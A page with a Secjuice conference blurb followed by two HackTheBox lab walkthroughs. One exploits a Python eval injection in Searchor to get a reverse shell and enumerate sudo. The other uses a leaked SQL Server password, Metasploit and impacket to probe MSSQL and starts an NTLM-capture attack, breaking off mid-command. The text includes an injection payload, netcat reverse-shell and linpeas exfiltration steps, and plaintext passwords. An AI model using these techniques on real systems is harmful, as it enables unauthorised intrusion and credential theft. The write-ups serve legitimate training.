After a decade of publishing your favorite infosec articles, we are very proud to announce SecjuiceCON 2025, our very first virtual conference. The first Secjuice conference is an online event for infosec and osint industry insiders, and we’d love for you to talk to our audience about your wisdom and learnings.
You might already know about our work, but Secjuice is the only non-profit, independent, and volunteer-led publication in the information security space. We are a private members’ writing club focused on cybersecurity, information security, hacking, and open-source intelligence gathering.
We believe that our value as professionals lies in our ability to share our research and knowledge with others through the written word. We mentor hackers and help them prepare their research for publication. Our members feel a strong sense of civic duty; it’s what drives us to spread our knowledge and experiences with our community. Defending the interests of those who hack is within our remit.
As usual, a nice and simple BOX with two relatively simple exploits even for beginners. Let’s go.
The nmap scan:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 15:08 EDT
Nmap scan report for 10.10.11.208
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_ 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://searcher.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.86 seconds
port 80 responds to the “searcher.htb” domain. Put it in the /etc/hosts file.
It seems to be a search engine collector. Wappalyzer reports python (3.10.6) and flask (2.1.2) technology.
The portal is based on version 2.4.0 of an open-source project called Searchor with the repository on git
Intercepting the calls using BurpSuite, I retrieve the request:
POST /search HTTP/1.1
Host: searcher.htb
Content-Length: 24
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://searcher.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://searcher.htb/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
engine=Amazon&query=test
Let’s try to investigate the code in the repository, crossing the information of the eval reported in the vulnerability and the request towards the /search routing. Download the 2.4.0 version of the source code (https://github.com/ArjunSharda/Searchor/releases/tag/v2.4.0).
Search the POST method…
def search(engine, query, open, copy):
try:
url = eval(
f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open})"
)
click.echo(url)
searchor.history.update(engine, query, url)
if open:
click.echo("opening browser...")
if copy:
click.echo("link copied to clipboard")
except AttributeError:
print("engine not recognized")
Apparently, you can run some python code, it will be easier using the last parameter (open). Sniffing the request setting the “Auto redirect” check with BurpSuite…
POST /search HTTP/1.1
Host: searcher.htb
Content-Length: 39
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://searcher.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://searcher.htb/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
engine=Amazon&query=test&auto_redirect=
It seems that the backend code only checks for the presence of the parameter, so I can’t take advantage of the “auto_redirect” parameter, I’ll have to use the “query” parameter. The purpose is to pass a value such that a command is executed in addition to the original one. Starting from the construction of the original string, then
we have to close the string at the point of the query parameter. Just pass the value as the query value
test')#
This will terminate the string with the single quote, close the search command with the closing parenthesis, and comment out everything that follows.
Since the search of the engine class accepts the remaining parameters with default values, there will be no problems, as the search method in this case will be launched specifying only the first parameter.
def search(self, query, open_web=False, copy_url=False, additional_queries: dict = None):
url = self.value.format(query=quote(query, safe=""))
if additional_queries:
url += ("?" if "?" not in self.value.split("/")[-1] else "&") + "&".join(
query + "=" + quote(query_val)
for query, query_val in additional_queries.items()
)
if open_web is True:
open_new_tab(url)
if copy_url is True:
pyperclip.copy(url)
return url
But now I have to try to inject the code I want to execute, but failing to concatenate another string, I take advantage of a trick that allows me to execute some code through the use of the format of a string. The output of the search command of the Engine class still returns a string, on which I can perform a format. Since there are no variable markers, the format will have no effect, but it will still allow me to execute some code. As usual, to test, I’ll run a curl to my listening machine to see if the injection was successful. The query parameter will then look something like this:
┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.151] from searcher.htb [10.10.11.208] 37746
/bin/sh: 0: can't access tty; job control turned off
$ whoami
svc
Navigate to the home folder and let’s find out he’s the user with the flag.
$ cat user.txt
f******************************2
Spawned a tty shell to test the sudo command but this user cannot launch sudo without a password. So, launch linpeas as usual, without leaving any trace.
Download linpeas and start the php native web server.
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.208 - Busqueda (lin)/attack/upld]
└─$ wget https://github.com/carlospolop/PEASS-ng/releases/download/20230425-bd7331ea/linpeas.sh
--2023-05-01 15:22:07-- https://github.com/carlospolop/PEASS-ng/releases/download/20230425-bd7331ea/linpeas.sh
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/ba2c0404-93e2-44d5-a884-e5c0a3af4a1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230501%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230501T192141Z&X-Amz-Expires=300&X-Amz-Signature=f1406d9bc0d84625cf1e57d0cbff85ba838dd4afbda36a5a4beee2260e83a21d&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [following]
--2023-05-01 15:22:08-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/ba2c0404-93e2-44d5-a884-e5c0a3af4a1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230501%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230501T192141Z&X-Amz-Expires=300&X-Amz-Signature=f1406d9bc0d84625cf1e57d0cbff85ba838dd4afbda36a5a4beee2260e83a21d&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 830030 (811K) [application/octet-stream]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[=============================================================================================================>] 810.58K --.-KB/s in 0.1s
2023-05-01 15:22:09 (5.56 MB/s) - ‘linpeas.sh’ saved [830030/830030]
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.208 - Busqueda (lin)/attack/upld]
└─$ php -S 10.10.14.151:80
[Mon May 1 15:22:12 2023] PHP 8.2.4 Development Server (http://10.10.14.151:80) started
Then start the netcat listener that will receive the scan output.
nc -lp 4445 | tee lpeasout.file
And finally, launch the attack on the remote machine.
Let the scan complete (check your netcat session).
linpeas output, interesting poits
[...]
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Dec 22 18:44 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Dec 22 18:44 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Dec 1 18:45 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ProxyPreserveHost On
ServerName searcher.htb
ServerAdmin admin@searcher.htb
ProxyPass / http://127.0.0.1:5000/
ProxyPassReverse / http://127.0.0.1:5000/
RewriteEngine On
RewriteCond %{HTTP_HOST} !^searcher.htb$
RewriteRule /.* http://searcher.htb/ [R]
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
ProxyPreserveHost On
ServerName gitea.searcher.htb
ServerAdmin admin@searcher.htb
ProxyPass / http://127.0.0.1:3000/
ProxyPassReverse / http://127.0.0.1:3000/
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
[...]
-rw-rw-r-- 1 svc svc 76 Apr 3 08:58 /home/svc/.gitconfig
[user]
email = cody@searcher.htb
name = cody
[core]
hooksPath = no-hooks
[...]
╔══════════╣ Checking if containerd(ctr) is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it
ctr: failed to dial "/run/containerd/containerd.sock": connection error: desc = "transport: error while dialing: dial unix /run/containerd/containerd.sock: connect: permission denied"
╔══════════╣ Checking if runc is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation
runc was found in /usr/sbin/runc, you may be able to escalate privileges with it
╔══════════╣ Searching docker files (limit 70)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation
lrwxrwxrwx 1 root root 33 Dec 21 19:13 /etc/systemd/system/sockets.target.wants/docker.socket -> /lib/systemd/system/docker.socket
-rw-r--r-- 1 root root 175 Jan 3 18:47 /usr/lib/systemd/system/docker.socket
-rw-r--r-- 1 root root 477 Jun 15 2022 /usr/local/lib/node_modules/pm2/node_modules/@pm2/io/docker-compose.yml
-rw-r--r-- 1 root root 0 Dec 21 19:13 /var/lib/systemd/deb-systemd-helper-enabled/sockets.target.wants/docker.socket
[...]
Found an additional domain (gitea.searcher.htb), insert it on the /etc/hosts file and try to navigate.
Gitea Version: 1.18.0+rc1
Searching for some exploit, I find something (even an RCE), but be being authenticated. After some more searching, I can’t find anything of interest, so, convinced that the next clue has something to do with git anyway, I search the repositories available in this BOX.
After searching the repository a bit, without much success, and not knowing exactly how to proceed, I start searching online and come across an interesting article.
It seems that I have found what I was looking for and finally can access the gitea portal. So, I can come back on one of the previous exploits that need credentials.
Unfortunately I can’t even create a new repository. Anyway, I can connect via ssh using the password.
$ sudo -l
sudo -l
[sudo] password for svc: jh1usoih2bkjaspwe92
Matching Defaults entries for svc on busqueda:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin,
use_pty
User svc may run the following commands on busqueda:
(root) /usr/bin/python3 /opt/scripts/system-checkup.py *
$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)
docker-ps : List running docker containers
docker-inspect : Inpect a certain docker container
full-checkup : Run a full system checkup
$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
960873171e2e gitea/gitea:latest "/usr/bin/entrypoint…" 4 months ago Up 8 hours 127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp gitea
f84a6b33fb5a mysql:8 "docker-entrypoint.s…" 4 months ago Up 8 hours 127.0.0.1:3306->3306/tcp, 33060/tcp mysql_db
$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect
Usage: /opt/scripts/system-checkup.py docker-inspect <format> <container_name>
$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
Something went wrong
I’ll probably have to use the docker command to elevate the privileges, but in the meantime let’s collect as much information as possible about the running containers as well.
Passwords don’t seem, in any case, to be useful. Since the script appeared to use the docker command anyway, I tried hard to exploit that, trying passing additional commands and injecting alternative commands, but without success. Then I took a look at the folder where the script is located and found a couple of interesting clues.
-bash-5.1$ ls -la /opt/scripts/
total 28
drwxr-xr-x 3 root root 4096 Dec 24 18:23 .
drwxr-xr-x 4 root root 4096 Mar 1 10:46 ..
-rwx--x--x 1 root root 586 Dec 24 21:23 check-ports.py
-rwx--x--x 1 root root 857 Dec 24 21:23 full-checkup.sh
drwxr-x--- 8 root root 4096 Apr 3 15:04 .git
-rwx--x--x 1 root root 3346 Dec 24 21:23 install-flask.sh
-rwx--x--x 1 root root 1903 Dec 24 21:23 system-checkup.py
Inside the folder is a script named after the third argument that takes the original script and there appears to be a git repository. However, I don’t have permission to read the files inside, but let’s try to proceed on this new path.
-bash-5.1$ git status
fatal: not a git repository (or any of the parent directories): .git
-bash-5.1$ ls -la .git
ls: cannot open directory '.git': Permission denied
The git repository route is to be abandoned; the script file remains.
-bash-5.1$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
[=] Docker conteainers
{
"/gitea": "running"
}
{
"/mysql_db": "running"
}
[=] Docker port mappings
{
"22/tcp": [
{
"HostIp": "127.0.0.1",
"HostPort": "222"
}
],
"3000/tcp": [
{
"HostIp": "127.0.0.1",
"HostPort": "3000"
}
]
}
[=] Apache webhosts
[+] searcher.htb is up
[+] gitea.searcher.htb is up
[=] PM2 processes
┌─────┬────────┬─────────────┬─────────┬─────────┬──────────┬────────┬──────┬───────────┬──────────┬──────────┬──────────┬──────────┐
│ id │ name │ namespace │ version │ mode │ pid │ uptime │ ↺ │ status │ cpu │ mem │ user │ watching │
├─────┼────────┼─────────────┼─────────┼─────────┼──────────┼────────┼──────┼───────────┼──────────┼──────────┼──────────┼──────────┤
│ 0 │ app │ default │ N/A │ fork │ 1655 │ 28h │ 0 │ online │ 0% │ 31.0mb │ svc │ disabled │
└─────┴────────┴─────────────┴─────────┴─────────┴──────────┴────────┴──────┴───────────┴──────────┴──────────┴──────────┴──────────┘
[+] Done!
Oh oh… the command that didn’t work before now seems to execute correctly, so it runs a script with that name contained in the folder you are in!
A very particular windows machine, in which I got stuck, stubbornly looking for an exploit which later turned out to be a simple clue left in plain sight that allowed a very trivial privesc. More challenging, but almost standard, the second privec which then led me to the desired root flag.
Let’s start with the nmap scan.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 17:03 EDT
Nmap scan report for 10.10.11.202
Host is up (0.11s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-03-13 05:03:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-03-13T05:04:24+00:00; +7h59m18s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-13T05:04:25+00:00; +7h59m18s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2023-03-13T05:04:24+00:00; +7h59m18s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-03-11T20:10:28
|_Not valid after: 2053-03-11T20:10:28
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-03-13T05:04:24+00:00; +7h59m18s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-13T05:04:25+00:00; +7h59m18s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h59m17s, deviation: 0s, median: 7h59m17s
| smb2-time:
| date: 2023-03-13T05:03:45
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.41 seconds
As usual, there are an infinite number of ports open on a windows machine and not happy, let’s also take a look at the UDP ports.
┌──(in7rud3r㉿kali-muletto)-[~/GoogleDrive/hackthebox]
└─$ sudo nmap -sU 10.10.11.202
[sudo] password for in7rud3r:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 17:13 EDT
Nmap scan report for 10.10.11.202
Host is up (0.11s latency).
Not shown: 998 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
123/udp open ntp
Nmap done: 1 IP address (1 host up) scanned in 290.76 seconds
Little steal, thank goodness! Ok, let’s analyze one port at a time!
Nothing about this set, unless I’ve missed something.
139, 445 – SMB
The enum4linux tool doesn’t enumerate anything in particular, let’s try a manual approach. I’m able to connect using the rpcclient tool (rpcclient -U “” -N 10.10.11.202), but investigating this would take too much time, I’ll mark it as an activity to come back to if I can’t find anything else and move on.
┌──(in7rud3r㉿kali-muletto)-[~/GoogleDrive/hackthebox/_10.10.11.202 - Escape (win)]
└─$ smbclient -L //10.10.11.202
Password for [WORKGROUPin7rud3r]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
The SAMBA client shows, among the classic windows shares, a “Public” folder that could be interesting, let’s take a look.
┌──(in7rud3r㉿kali-muletto)-[~/GoogleDrive/hackthebox/_10.10.11.202 - Escape (win)]
└─$ smbclient --no-pass \\10.10.11.202\Public
Try "help" to get a list of possible commands.
smb: > dir
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1428481 blocks available
smb: > get "SQL Server Procedures.pdf"
getting file SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (10.3 KiloBytes/sec) (average 10.3 KiloBytes/sec)
Give a look at the pdf file.
Well, a good domain to insert into my /etc/hosts; go ahead.
389 (636, 3268, 3269) – LDAP
As for LDAP, I tried to navigate the structure using phpLDAPAdmin as usual, but without success.
1433 – SQL Server
And for the uninitiated, port 1433 is the one reserved for SQL Server. There will be a lot of work here; let’s work.
The Metasploit Framework is full of attacks for SQL Server… and I think I’ve tried a lot of them.
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > use admin/mssql/mssql_enum
msf6 auxiliary(admin/mssql/mssql_enum) > options
Module options (auxiliary/admin/mssql/mssql_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1433 yes The target port (TCP)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/mssql/mssql_enum) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_enum) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_enum) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_enum) > exploit
[*] Running module against 10.10.11.202
[*] 10.10.11.202:1433 - Running MS SQL Server Enumeration...
[*] 10.10.11.202:1433 - Version:
[*] Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
[*] Sep 24 2019 13:48:23
[*] Copyright (C) 2019 Microsoft Corporation
[*] Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
[*] 10.10.11.202:1433 - Configuration Parameters:
[*] 10.10.11.202:1433 - C2 Audit Mode is Not Enabled
[...]
[*] 10.10.11.202:1433 - sp_getbindtoken
[*] 10.10.11.202:1433 - sp_replincrementlsn
[*] 10.10.11.202:1433 - Instances found on this server:
[*] 10.10.11.202:1433 - Default Server Instance SQL Server Service is running under the privilege of:
[*] 10.10.11.202:1433 - xp_regread might be disabled in this system
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mssql/mssql_enum) > use admin/mssql/mssql_enum_domain_accounts
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > options
Module options (auxiliary/admin/mssql/mssql_enum_domain_accounts):
Name Current Setting Required Description
---- --------------- -------- -----------
FuzzNum 10000 yes Number of principal_ids to fuzz.
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1433 yes The target port (TCP)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > exploit
[*] Running module against 10.10.11.202
[*] 10.10.11.202:1433 - Attempting to connect to the database server at 10.10.11.202:1433 as PublicUser...
[+] 10.10.11.202:1433 - Connected.
[*] 10.10.11.202:1433 - SQL Server Name: DC
[...][
[+] 10.10.11.202:1433 - 31 user accounts, groups, and computer accounts were found.
[*] 10.10.11.202:1433 - Query results have been saved to: /home/in7rud3r/.msf4/loot/20230313173523_default_10.10.11.202_mssql.domain.acc_775956.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > use admin/mssql/mssql_enum_sql_logins
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > options
Module options (auxiliary/admin/mssql/mssql_enum_sql_logins):
Name Current Setting Required Description
---- --------------- -------- -----------
FuzzNum 300 yes Number of principal_ids to fuzz.
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1433 yes The target port (TCP)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > exploit
[*] Running module against 10.10.11.202
[*] 10.10.11.202:1433 - Attempting to connect to the database server at 10.10.11.202:1433 as PublicUser...
[...]
[*] 10.10.11.202:1433 - - PublicUser
[*] 10.10.11.202:1433 - - sa
[*] 10.10.11.202:1433 - - sequelAdministrator
[*] Auxiliary module execution completed
I omitted some of the exploits I ran and also omitted some sections of the information returned by the scans, so as not to take up too much reading time.
But let’s connect to the SQL Server instance and investigate the contents of the DBs.
┌──(in7rud3r㉿kali-muletto)-[~]
└─$ python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DCSQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DCSQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> select @@version
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
SQL> SELECT name, database_id, create_date FROM sys.databases;
name database_id create_date
-------------------------------------------------------------------------------------------------------------------------------- ----------- -----------
master 1 2003-04-08 09:13:36
tempdb 2 2023-03-13 09:35:39
model 3 2003-04-08 09:13:36
msdb 4 2019-09-24 14:21:42
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
-------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- ----------
master dbo spt_fallback_db b'BASE TABLE'
master dbo spt_fallback_dev b'BASE TABLE'
master dbo spt_fallback_usg b'BASE TABLE'
master dbo spt_values b'VIEW'
master dbo spt_monitor b'BASE TABLE'
SQL> use tempdb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: tempdb
[*] INFO(DCSQLMOCK): Line 1: Changed database context to 'tempdb'.
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
-------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- ----------
SQL> use model
[-] ERROR(DCSQLMOCK): Line 1: The server principal "PublicUser" is not able to access the database "model" under the current security context.
SQL> use msdb
[*] ENVCHANGE(DATABASE): Old Value: tempdb, New Value: msdb
[*] INFO(DCSQLMOCK): Line 1: Changed database context to 'msdb'.
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
-------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- ----------
msdb dbo syspolicy_policy_category_subscriptions b'VIEW'
msdb dbo syspolicy_system_health_state b'VIEW'
msdb dbo syspolicy_policy_execution_history b'VIEW'
msdb dbo syspolicy_policy_execution_history_details b'VIEW'
msdb dbo syspolicy_configuration b'VIEW'
msdb dbo syspolicy_conditions b'VIEW'
msdb dbo syspolicy_policy_categories b'VIEW'
msdb dbo sysdac_instances b'VIEW'
msdb dbo syspolicy_object_sets b'VIEW'
msdb dbo dm_hadr_automatic_seeding_history b'BASE TABLE'
msdb dbo syspolicy_policies b'VIEW'
msdb dbo backupmediaset b'BASE TABLE'
msdb dbo backupmediafamily b'BASE TABLE'
msdb dbo backupset b'BASE TABLE'
msdb dbo autoadmin_backup_configuration_summary b'VIEW'
msdb dbo backupfile b'BASE TABLE'
msdb dbo syspolicy_target_sets b'VIEW'
msdb dbo restorehistory b'BASE TABLE'
msdb dbo restorefile b'BASE TABLE'
msdb dbo syspolicy_target_set_levels b'VIEW'
msdb dbo restorefilegroup b'BASE TABLE'
msdb dbo logmarkhistory b'BASE TABLE'
msdb dbo suspect_pages b'BASE TABLE'
SQL>
Besides the SQL Server version which may come in handy to identify some specific exploit, the DB doesn’t seem to contain many schemas and tables. I tried some exciting system queries, but most of them gave “permission denied“. I, therefore, rely on the now official guide for identifying vulnerabilities.
Inside the guide, we find an interesting attack, which is worth trying.
The concept behind this attack is to force the SQL Server to authenticate to a fake server that will capture the unsuspecting service’s credentials.
So, activate our responder…
┌──(in7rud3r㉿kali-muletto)-[~]
